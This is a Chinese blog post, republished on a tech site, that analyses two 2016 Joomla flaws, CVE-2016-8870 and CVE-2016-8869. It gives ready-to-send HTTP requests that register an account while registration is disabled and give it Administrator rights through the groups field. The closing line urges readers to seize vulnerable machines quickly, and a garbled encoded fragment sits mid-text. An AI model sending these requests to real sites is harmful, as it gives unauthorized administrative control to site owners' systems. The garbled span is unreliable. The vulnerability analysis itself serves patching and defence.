频道栏目
首页 > 系统 > 其他 > 正文

joomla未授权创建特权用户分析(CVE-2016-8870和CVE-2016-8869)

2016-10-27 09:34:07         来源:Bendawang's Blog  
收藏   我要投稿

今天突然看到joomla爆出新的漏洞,个人比较感兴趣所以分析了下。

1、漏洞影响版本

joomla 3.4.4 to 3.6.3

利用CVE-2016-8870,在网站关闭注册的情况下仍可创建用户

利用CVE-2016-8869,进行提权

2、漏洞复现

2.1 利用CVE-2016-8870创建用户

位于components/com_users/controllers下的registration.php和user.php有如下代码:

首先是registration.php下UsersControllerRegistration类的register函数的部分代码如下:

这里写图片描述

然后是user.php下UsersControllerUser类的register函数的完整代码如下:

public function register()
{
  JSession::checkToken('post') or jexit(JText::_('JINVALID_TOKEN'));

  // Get the application
  $app = JFactory::getApplication();

  // Get the form data.
  $data = $this->input->post->get('user', array(), 'array');

  // Get the model and validate the data.
  $model  = $this->getModel('Registration', 'UsersModel');

  $form = $model->getForm();

  if (!$form)
  {
     JError::raiseError(500, $model->getError());

     return false;
  }

  $return = $model->validate($form, $data);

  // Check for errors.
  if ($return === false)
  {
     // Get the validation messages.
     $errors = $model->getErrors();

     // Push up to three validation messages out to the user.
     for ($i = 0, $n = count($errors); $i < $n && $i < 3; $i++)
     {
        if ($errors[$i] instanceof Exception)
        {
           $app->enqueueMessage($errors[$i]->getMessage(), 'notice');

           continue;
        }

        $app->enqueueMessage($errors[$i], 'notice');
     }

     // Save the data in the session.
     $app->setUserState('users.registration.form.data', $data);

     // Redirect back to the registration form.
     $this->setRedirect('index.php?option=com_users&view=registration');

     return false;
  }

  // Finish the registration.
  $return = $model->register($data);

  // Check for errors.
  if ($return === false)
  {
     // Save the data in the session.
     $app->setUserState('users.registration.form.data', $data);

     // Redirect back to the registration form.
     $message = JText::sprintf('COM_USERS_REGISTRATION_SAVE_FAILED', $model->getError());
     $this->setRedirect('index.php?option=com_users&view=registration', $message, 'error');

     return false;
  }

  // Flush the data from the session.
  $app->setUserState('users.registration.form.data', null);

  return true;
}

很显然的差距,就是user.php下少了这部分代码,很容易看懂,就是如果网关闭注册,那就直接跳转至login页面

// If registration is disabled - Redirect to login page.
if (JComponentHelper::getParams('com_users')->get('allowUserRegistration') == 0)
{
   $this->setRedirect(JRoute::_('index.php?option=com_users&view=login', false));

   return false;
}

也就是说如果能够调用user.php下UsersControllerUser类,那么就可以用UsersControllerUser::register()这个方法来进行注册就可以绕过这个检测。

接下来模拟一下过程,joomla安装好之后默认情况下是关闭注册的,首页也没有注册的选项。

先打开注册选项,然后去注册,抓包如下(不用管那堆乱七八糟的cookie):



POST /joomla/index.php/component/users/?task=registration.register HTTP/1.1

Host: 127.0.0.1:8000

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://127.0.0.1:8000/joomla/index.php/component/users/?view=registration

Cookie: Hm_lvt_6b15558d6e6f640af728f65c4a5bf687=1476171578,1476175753; bdshare_firstime=1476879802433; ck_login_id_20=1; ck_login_language_20=en_us; ck_login_theme_20=Sugar5; sYQDUGqqzHsearch_history=asdf%7C2%2Casdf%7C52%2Casdf%7C3%2Casdf%7C1; eeeaf53e25e90a39ff315452d513d988=rn180tb8srhihcgnqpo4avgtt6; 9d4bb4a09f511681369671a08beff228=gonv4bis6b1cu1f0c7mpbr2kt7; 5fdbb0240381dcfb784bf866abf180ba=khak6ckt63vlt7n116ma3ep7v1; 72ade33b26d1725575072c551da17dac=pd1k5dr7aqndmkuckl4f6umni4

Connection: keep-alive

Upgrade-Insecure-Requests: 1

Content-Type: multipart/form-data; boundary=---------------------------21344283549747877901996448611

Content-Length: 1239



-----------------------------21344283549747877901996448611

Content-Disposition: form-data; name="jform[name]"



Bendawang

-----------------------------21344283549747877901996448611

Content-Disposition: form-data; name="jform[username]"



Bendawang

-----------------------------21344283549747877901996448611

Content-Disposition: form-data; name="jform[password1]"



Bendawang

-----------------------------21344283549747877901996448611

Content-Disposition: form-data; name="jform[password2]"



Bendawang

-----------------------------21344283549747877901996448611

Content-Disposition: form-data; name="jform[email1]"



Bendawang@bdw.com

-----------------------------21344283549747877901996448611

Content-Disposition: form-data; name="jform[email2]"



bendawang12138@163.com

-----------------------------21344283549747877901996448611

Content-Disposition: form-data; name="option"



com_users

-----------------------------21344283549747877901996448611

Content-Disposition: form-data; name="task"



registration.register

-----------------------------21344283549747877901996448611

Content-Disposition: form-data; name="9da03819be371b7d0c51983dcf98816f"



1

-----------------------------21344283549747877901996448611--


然后能够成功注册

这里写图片描述

这里观察发送的请求参数task=registration.register能够知道这里默认注册是调用的registration.php下UsersControllerRegistration类,但是我们想要调用的是user.php下UsersControllerUser

这里把后台的注册关掉,把刚才那个正常注册的号删掉。<喎"http://www.2cto.com/kf/ware/vc/" target="_blank" class="keylink">vcD4NCjxwPrj5vt20+sLrwt+8rTwvcD4NCjxwPs7Sw8fP69KqtffTw3VzZXIucGhwz8JVc2Vyc0NvbnRyb2xsZXJVc2VywNu1xHJlZ2lzdGVyt723qKOsy/nS1Lm51OzI58/Cx+vH8zwvcD4NCjxwcmUgY2xhc3M9"brush:sql;"> POST /joomla/index.php/component/users/?task=registration.register HTTP/1.1 Host: 127.0.0.1:8000 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:8000/joomla/index.php/component/users/?view=registration Cookie: Hm_lvt_6b15558d6e6f640af728f65c4a5bf687=1476171578,1476175753; bdshare_firstime=1476879802433; ck_login_id_20=1; ck_login_language_20=en_us; ck_login_theme_20=Sugar5; sYQDUGqqzHsearch_history=asdf%7C2%2Casdf%7C52%2Casdf%7C3%2Casdf%7C1; eeeaf53e25e90a39ff315452d513d988=rn180tb8srhihcgnqpo4avgtt6; 9d4bb4a09f511681369671a08beff228=gonv4bis6b1cu1f0c7mpbr2kt7; 5fdbb0240381dcfb784bf866abf180ba=khak6ckt63vlt7n116ma3ep7v1; 72ade33b26d1725575072c551da17dac=pd1k5dr7aqndmkuckl4f6umni4 Connection: keep-alive Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------------------21344283549747877901996448611 Content-Length: 1230 -----------------------------21344283549747877901996448611 Content-Disposition: form-data; name="user[name]" Bendawang -----------------------------21344283549747877901996448611 Content-Disposition: form-data; name="user[username]" Bendawang -----------------------------21344283549747877901996448611 Content-Disposition: form-data; name="user[password1]" Bendawang -----------------------------21344283549747877901996448611 Content-Disposition: form-data; name="user[password2]" Bendawang -----------------------------21344283549747877901996448611 Content-Disposition: form-data; name="user[email1]" bendawang12138@163.com -----------------------------21344283549747877901996448611 Content-Disposition: form-data; name="user[email2]" bendawang12138@163.com -----------------------------21344283549747877901996448611 Content-Disposition: form-data; name="option" com_users -----------------------------21344283549747877901996448611 Content-Disposition: form-data; name="task" user.register -----------------------------21344283549747877901996448611 Content-Disposition: form-data; name="9da03819be371b7d0c51983dcf98816f" 1 -----------------------------21344283549747877901996448611--

即把post请求参数中的所有参数名中的jform换成user

再把post请求参数中的名为task的参数由registration.register换为user.register

然后发送,截图如下,注册成功。

这里写图片描述

以上是CVE-2016-8870漏洞的内容,只是创建一个普通用户。

接下来就是真正CVE-2016-8869的内容。

主要目的:提权!!!

2.2 利用CVE-2016-8869进行提权操作

首先我们再看上一小节利用CVE-2016-8870注册的时候,我们使用的user.php下UsersControllerUser累的register方法的最后面有这样一句代码

$return = $model->register($data);

这句代码调用了components/com_users/models/registration.php下的register方法,我们来看看这个方法

这里写图片描述

这里只截取了一小部分,然后这里我们把$data打印如下:

这里写图片描述

由下图可以看到其实我们这个$data实际还存在一个参数是groups数组,而这个数组就决定了账户的权限。

这里groups的第一个值决定了账户的权限,权限列表如下。

1:Public

2:Registered

3:Author

4:Editor

5:Publisher

6:Manager

7:Administrator

默认情况下我们注册时groups的第一个值为2,即Registered,这里我们直接构造如下:

我们构造如下数据包

POST /joomla/index.php/component/users/?task=registration.register HTTP/1.1

Host: 127.0.0.1:8000

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://127.0.0.1:8000/joomla/index.php/component/users/?view=registration

Cookie: Hm_lvt_6b15558d6e6f640af728f65c4a5bf687=1476171578,1476175753; bdshare_firstime=1476879802433; ck_login_id_20=1; ck_login_language_20=en_us; ck_login_theme_20=Sugar5; sYQDUGqqzHsearch_history=asdf%7C2%2Casdf%7C52%2Casdf%7C3%2Casdf%7C1; eeeaf53e25e90a39ff315452d513d988=rn180tb8srhihcgnqpo4avgtt6; 9d4bb4a09f511681369671a08beff228=gonv4bis6b1cu1f0c7mpbr2kt7; 72ade33b26d1725575072c551da17dac=56dhrsu2p3rdefnjfktdhp8dr7; 5fdbb0240381dcfb784bf866abf180ba=vna9ecejm5rof04o1a7umbmo23

Connection: keep-alive

Upgrade-Insecure-Requests: 1

Content-Type: multipart/form-data; boundary=---------------------------12126918671528593691690879232

Content-Length: 1350



-----------------------------12126918671528593691690879232

Content-Disposition: form-data; name="user[name]"



Bendawang

-----------------------------12126918671528593691690879232

Content-Disposition: form-data; name="user[username]"



Bendawang

-----------------------------12126918671528593691690879232

Content-Disposition: form-data; name="user[password1]"



Bendawang

-----------------------------12126918671528593691690879232

Content-Disposition: form-data; name="user[password2]"



Bendawang

-----------------------------12126918671528593691690879232

Content-Disposition: form-data; name="user[email1]"



bendawang12138@163.com

-----------------------------12126918671528593691690879232

Content-Disposition: form-data; name="user[email2]"



bendawang12138@163.com

-----------------------------12126918671528593691690879232

Content-Disposition: form-data; name="user[groups][]"



7

-----------------------------12126918671528593691690879232

Content-Disposition: form-data; name="option"



com_users

-----------------------------12126918671528593691690879232

Content-Disposition: form-data; name="task"



user.register

-----------------------------12126918671528593691690879232

Content-Disposition: form-data; name="ad46184799be6e742bc96a739ac62ffa"



1

-----------------------------12126918671528593691690879232--

直接构造Administrator发包,后台观查成功注册:

这里写图片描述

复现完了,趁现在赶紧抓一波机啊。。。

上一篇:openfalcon - agent - fastdfs
下一篇:在RHEL6上安装Mellanox Infiniband hardware (HCA卡)的驱动
相关文章
图文推荐
热门新闻

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站